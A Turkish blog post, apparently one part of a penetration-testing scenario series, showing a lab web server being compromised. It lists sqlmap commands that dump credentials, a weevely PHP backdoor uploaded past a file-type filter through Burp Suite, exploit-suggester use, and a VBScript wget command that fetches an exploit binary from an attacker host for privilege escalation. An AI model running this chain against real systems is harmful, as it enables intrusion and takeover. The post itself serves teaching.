Sızma Testi Senaryosu – Bölüm 6

Merhabalar,

Bu senaryomuzda hedef sistem olarak bir web server seçtim, amacımız hedef web uygulamasında olan sql injection zafiyeti üzerinden sistemi ele geçirmek ve privilege escalation (yetki yükseltme) yapmaktır.

Öncelikle hedef sistemin URL adresi 192.168.219.131/versi_2.29/versi_2.29/index.php budur, herhangi bir zafiyet tarama aracı ile taradığımız zaman böyle bir sonuç çıkardı önümüze, görüldüğü gibi index.php'de bir sql inj açığı bulunmakta.
Zafiyetin bulundugu URL adresine sqlmap ile girmem gerekiyor bunun için " sqlmap -u "hedefsistem.com?id=1" --dbs "database'leri görüntülemesini belirttik" görüldüğü gibi DB'ler listelendi.
Şimdi ise "--dbs silinir ve -D "DB ismi" ve bu db üzerindeki tablolar için --tables parametresi kullanılır." görüldüğü gibi tablolar karşımızda biz burda username ve passwordlerin tutuldugu tabloyu dump etmemiz gerekiyor.
Bunun için "--tables" parametresi silinir ve "-T "tablo ismi" --dump "yani belirtilen tablodaki bütün dataları çek dedik." görüldüğü gibi bütün bilgilierli çıkarttı bize, username "admin" password "admin1234".
Şimdi ise admin panelini bulmak için havij adlı tool ile panel taraması yapıyoruz bunun için "FindAdmin" sekmesine girilir ve url adresi yazılır ve son olarak "start" butonuna tıklanılır. görüldüğü gibi bize cevap olarak 302 hatası döndü panelimiz bu çünkü havijin belirtmiş oldugu adrese girdiğimiz zaman bizi /adminpanel/index.php adresine yönlendirmektedir.
Evet şimdi panele elde etmiş oldugumuz kullanıcı adı ve parola ile login oluyoruz.
Şimdi ise weevely adlı backoor tool'umuz ile bir php backdook oluşturuyoruz. "weevely generate "parola" /root/isim.php" şeklinde oluşturulur.
Şimdi ise bu backdoor'u upload etmemiz gerekiyor fakat .jpg, .gif uzantılı dosyaları kabul ettiği için burp suite ile araya girerek bunu php olarak upload edeceğiz. Burpsuiti ile araya girmek için browser üzerinden dinlemeyi burpsuite aktarmamız gerekiyor bunun için gerekli ayarlar aşağıdaki gibidir.
Evet dosyamızı seçmeden önce sonuna .jpg uzantısını koydum ve .php.jpg olarak seçtim upload dediğim zaman burpsuite datalar geldi, burada "filname= a.php.jpg" kısmındaki .jpg silinir ve "a.php" olarak kalır ve son olarak "Forward" butonuna tıklatarak dosya yükleme işlemi gerçekleştirilir
Şimdi yüklemiş oldugumuzu dosyanın üzerine sağ tıklayıp dizin yolunu kopyalıyoruz, çünkü weevely ile bağlanırken gerekecektir.
Evet şimdi terminal'i açıyoruz ve "weevely "backdoorun dizin yolu/a.php" "backdoor oluşturulurken belirtilen parola" yazılır ve görüldüğü gibi siteme giriş yaptık, fakat görüldüğü gibi root değiliz sistemde.
Şimdi ise sistemdeki zafiyetleri görüntülemek için ufak bir script çalıştıracağız, https://github.com/GDSSecurity/Windows-Exploit-Suggester/ bu adresden indirilir. Ve dizine girilir, görüldüğü gibi 3 tane dosya var, şimdi xls dosyasyını indirmek için "python isim.py --update" komutu ile ensonki güvenlik açıklarının listesini indirecektir, ve ls komutu ile baktıgımız zaman 2017'deki vuln'ları bize download etti.
şimdi ise weevely satırına geri dönüyoruz ve "systeminfo" komutu ile hedef sistem hakkındaki bilgileri görüntülüyoruz ve hepsini seçip kopyalıyoruz ve scriptimizin oldugu dizine isim.txt şeklinde bir dosya oluşturup içerisine yapıştırıyoruz.
Şimdi ise "python script.py --database db.xls --systeminfo isim.txt" şeklinde görüldüğü gibi bu sistemdeki özelliklere ayit bu açıklar bulunumaktaymış. Şimdi biz MS06-032 privilege exploitini download ediyoruz. NOT: --systeminfo komutu yerine direk --os 'windows 7 sp1' şeklindede yazılabilir, yani hedef sistem elinizde değilse nmap çıktısındaki versiyon bilgisi doğurltusunda böylede zafiyet tespiti yapabilirsiniz.
Evet exploitimi indirdik ve /var/www dizinine attık şimdi ise "service apache2 start" ve "service mysql start" komutları ile servislermizi start konuma getiriyoruz.
Şimdi ise sisteme bu exploiti yüklememiz gerekiyor, peki nasıl yükleyeceğiz? tabiki VBSCRİPT candır :) https://gist.github.com/sckalath/ec7af6a1786e3de6c309 adresdeki vbscript kodlarını shell satırına yapıştırın.
ve son olarak " cscript wget.vbs http://<saldırgan IP>/dosyaismi.exe dosyaismi.exe" şeklinde komutu çalıştırarak sisteme dosyayı yüklemiş oluyoruz görüldüğü gibi "dir" komutu ile görüntülediğimiz zaman dosya sisteme yüklenmiş. Son olarak exploiti çalıştarark root olabilirsiniz....
Güvenli Günler

Yorumlar

Bu blogdaki popüler yayınlar

Sızma Testi Senaryosu - Bölüm 1

MS17-010 Zafiyetiden Faydalanarak Domain Controller Ele Geçirme

Windows İşletim Sisteminde Yetki Yükseltme - 1